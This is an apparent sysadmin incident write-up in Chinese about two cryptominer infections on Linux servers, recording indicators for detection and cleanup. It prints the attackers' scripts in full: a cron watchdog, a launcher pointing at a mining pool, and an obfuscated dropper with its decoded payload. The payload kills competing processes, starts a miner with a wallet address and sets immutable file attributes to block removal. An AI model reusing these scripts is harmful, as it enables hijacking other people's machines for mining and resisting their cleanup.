两个挖矿程序特征20190510

  sre

5fc8e1e29895d3613.jpg_fo742.jpg

第一个

发现cpu高占用的进程,其二进制如下:

[root@test1 ~]# md5sum /tmp/.../r64
4ea6af6fa6ebb8bb6c51a6dde637c181  /tmp/.../r64

md5特征:

http://v.virscan.org/language/zh-tw/Win32/Virus.RiskTool.42d.html
http://v.virscan.org/Linux/BitCoinMiner.dypoa.html
http://v.virscan.org/Win32/Virus.RiskTool.42d.html
https://www.scumware.org/report/4EA6AF6FA6EBB8BB6C51A6DDE637C181.html

其他特征:

[root@test1 ~]# crontab -l
* * * * * /tmp/.../upd >/dev/null 2>&1
[root@test1 ~]# md5sum /tmp/.../upd
e5267c19fd2be9c276bf29e35444965f  /tmp/.../upd
[root@test1 ~]# cat /tmp/.../upd
#!/bin/sh
# Persistence watchdog dropped as /tmp/.../upd and run every minute from cron (see crontab -l above).
# Several `$` characters look like they were dropped by the page renderer (`pid=(cat …)`, `kill -CHLD pid`);
# match the sample by the md5sum listed above, not by this transcript.
if test -r /tmp/.../bash.pid; then
pid=(cat /tmp/.../bash.pid)
# SIGCHLD is ignored by default, so this kill only probes whether the recorded PID still exists
if(kill -CHLD pid >/dev/null 2>&1)
then
sleep 1
else
# PID gone: relaunch the miner via ./run from the hidden directory
cd /tmp/...
./run &>/dev/null
exit 0
fi
fi
[root@test1 ~]# ll /tmp/.../bash.pid
-rwxrwxrwx 1 root root 6 May 10 14:07 /tmp/.../bash.pid
[root@test1 ...]# pwd
/tmp/...
[root@test1 ...]# ll
total 960
-rwxrwxrwx 1 root root    329 Mar 13 03:50 a
-rwxrwxrwx 1 root root      6 May 10 14:08 bash.pid
-rw-r--r-- 1 root root     39 May  9 06:33 cron.d
-rw-r--r-- 1 root root      9 May  9 06:33 dir.dir
-rwxrwxrwx 1 root root 496692 Feb 28 13:57 r32
-rwxrwxrwx 1 root root 454196 Mar 12 06:44 r64
-rwxrwxrwx 1 root root    309 Mar 13 03:49 run
-rwxr--r-- 1 root root    173 May  9 06:33 upd
-rwxrwxrwx 1 root root     23 May 14  2018 x
[root@test1 ...]# cat run 
#!/bin/bash
# Launcher for the miner binaries r32/r64 (r64 md5 listed above), selected by CPU architecture.
# `"ARCH"` and `echo!` look like a `$` was eaten by the page renderer (compare the surviving `$Cz`
# in the second sample); as printed, the comparisons are against the literal string "ARCH".
# Rely on the md5sums, not this transcript, for matching.

ARCH=`uname -m`


if [ "ARCH" == "i686" ];       then
      # Network IoC: stratum pool miningv2.duckdns.org:1338. Flags resemble the xmrig CLI
      # (-o pool, -p password, -B background) — not verified against the binary itself.
      ./r32 -o stratum+tcp://miningv2.duckdns.org:1338 -p x -k -B --nicehash >>/dev/null &
elif [ "ARCH" == "x86_64" ];   then
      ./r64 -o stratum+tcp://miningv2.duckdns.org:1338 --nicehash -B -k -p x >>/dev/null &
fi
# bash.pid (6 bytes in the directory listing above) is the file upd probes with kill -CHLD
echo! > bash.pid

[root@test1 ...]# cat cron.d 
* * * * * /tmp/.../upd >/dev/null 2>&1

第二个

二进制路径是/tmp/.（点后面还跟着若干空格，见下文的 chattr 行），这个点不是目录而是二进制文件，比较迷惑。
定时器:

[root@test2 ~]# cat /tmp/.ssh3
# Obfuscated dropper /tmp/.ssh3 (protected with chattr +i +a, per the lsattr output below).
# z holds a single newline; every other variable holds a short fragment of the real script, and the
# eval line concatenates the fragments in order. Most `$` before the fragment names appear to have been
# eaten by the page renderer (only the final `$Cz` survived). The reassembled commands are shown
# decoded further down the page.
z="
";cBz='a .s';LBz='000+';dz='rgg';nz='Wbwt';Gz='l xs';JBz='m7E5';vz='HkLc';Sz='2';Lz='l xm';WBz='el=3';EBz='2WMu';Fz='ux';Vz='l x6';Pz='l py';Wz='4';QBz='1:55';oz='5ZaQ';UBz='nate';dBz='i ."';xz='82U4';Oz='va';ZBz='tr +';lz='u 45';Xz='rig';Uz='pcd';wz='KMS1';Cz='  "';Hz='l ba';fz=' nsy';CBz='7nDA';IBz='hwHJ';cz='l xo';kz=' " -';Yz='l ss';Rz='l x3';Az='pkil';qz='8Na7';gz='hs';Iz='sh64';mz='z52t';PBz='46e4';yz='vvLq';bBz='sh3';Kz='ft';Mz='32';iz='/." ';eBz='a ."';Dz='l ld';Tz='l dh';VBz='-lev';bz='rn';Zz='hd64';sz='hkWJ';pz='r4yQ';az='l ma';rz='8aRi';NBz='-o 0';MBz='cn2 ';jz='    ';aBz='i .s';HBz='TjA1';Ez='-lin';XBz=' -B';YBz='chat';ABz='yZaD';Nz='l ja';RBz='55 -';tz='JXVP';ez='l -9';SBz='p x ';OBz='x362';hz='/tmp';BBz='eyZR';Bz='l " ';DBz='E3Fp';FBz='tEVE';GBz='9Xwr';Qz='thon';KBz='F.10';Jz='l so';uz='taMe';TBz='--do';
eval "AzBzCzzAzDzEzFzzAzGzzAzHzIzzAzJzKzzAzLzMzzAzNzOzzAzPzQzzAzRzSzzAzTzUzzAzVzWzzAzLzXzzAzYzZzzAzVzWzzAzazbzzAzczdzzAzezfzgzzhzizjzkzlzmznzozpzqzrzsztzuzvzwzxzyzABzBBzCBzDBzEBzFBzGBzHBzIBzJBzKBzLBzMBzNBzOBzPBzQBzRBzSBzTBzUBzVBzWBzXBzzYBzZBzaBzbBzzYBzZBzcBzbBzzYBzZBzdBzjzCzzYBzZBzeBzjz$Cz"
[root@test2 ~]# lsattr /tmp/.ssh3
----ia-------e-- /tmp/.ssh3
[root@test2 ~]# chattr -i -a -e /tmp/.ssh3
[root@test2 ~]# vim /tmp/.ssh3

[root@test2 ~]# bash /tmp/.ssh3

# Decoded payload of /tmp/.ssh3, as printed by running the copy edited in vim above. The page does not
# show what was changed — presumably eval was replaced by echo; confirm against your own copy.
# First a list of process names is killed; the names (xmrig, x64, dhpcd, …) suggest competing miners
# are being evicted, but that is inferred from the names only.
pkill "   "
pkill ld-linux
pkill xs
pkill bash64
pkill soft
pkill xm32
pkill java
pkill python
pkill x32
pkill dhpcd
pkill x64
pkill xmrig
pkill sshd64
pkill x64
pkill marn
pkill xorgg
pkill -9 nsyhs
# Start the miner: the binary is /tmp/. followed by six spaces (the "/tmp/." the text above refers to).
# Flags resemble the xmrig CLI (-u wallet.worker, -o pool, -p password, --donate-level, -B background)
# — not verified against the binary. 0x36246e41 is an integer IP literal; it decodes to 54.36.110.65
# if the resolver accepts inet_aton's hex form (derived value — confirm before blocking).
/tmp/."      " -u 45z52tWbwt5ZaQr4yQ8Na78aRihkWJJXVPtaMeHkLcKMS182U4vvLqyZaDeyZR7nDAE3Fp2WMutEVE9XwrTjA1hwHJm7E5F.10000+cn2 -o 0x36246e41:5555 -p x --donate-level=3 -B
# Relative paths, so the script expects to run from /tmp. Marking the dropper and the binary
# immutable/append-only makes rm and truncation fail; this matches the `ia` flags in the lsattr output
# above and is why cleanup had to run chattr -i -a first.
chattr +i .ssh3
chattr +a .ssh3
chattr +i ."      "
chattr +a ."      "
